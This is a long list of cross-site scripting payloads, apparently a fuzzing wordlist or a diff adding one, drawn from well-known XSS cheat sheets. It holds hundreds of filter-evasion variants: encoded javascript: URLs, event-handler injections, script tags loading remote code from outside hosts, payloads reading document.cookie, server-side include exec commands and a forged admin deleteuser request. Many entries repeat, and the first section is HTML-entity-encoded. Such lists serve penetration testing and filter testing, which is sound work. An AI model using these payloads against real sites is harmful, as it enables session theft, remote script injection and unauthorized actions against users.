ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo 
'&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A 
HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG 
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> 
+¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! 
foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +“><ScRiPt>alert(document.cookie)</script> +“><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E +‘; alert(document.cookie); var foo=’ +foo\’; alert(document.cookie);//’; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(’XSS’)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" 
+<script/src=data:,alert()> +<marquee/onstart=alert()> +<video/poster/onerror=alert()> +<isindex/autofocus/onfocus=alert()> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; +&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& +#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</script><script>alert('XSS');</script> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY 
BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV 
STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" +veris-->group<svg/onload=alert(/XSS/)// +#"><img src=M onerror=alert('XSS');> +element[attribute='<img src=x onerror=alert('XSS');> +[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] +%22;alert%28%27RVRSH3LL_XSS%29// +javascript:alert%281%29; +<w contenteditable id=x onfocus=alert()> +alert;pg("XSS") +<svg/onload=%26%23097lert%26lpar;1337)> +<script>for((i)in(self))eval(i)(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> +<sCR<script>iPt>alert(1)</SCr</script>IPt> +<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<IMG 
SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x 
onmouseout="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x 
onseeked="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> +<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<INPUT TYPE="BUTTON" action="alert('XSS')"/> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF +"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> +><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr +g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 +<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<iframe src=http://xss.rocks/scriptlet.html < +<IFRAME 
SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style 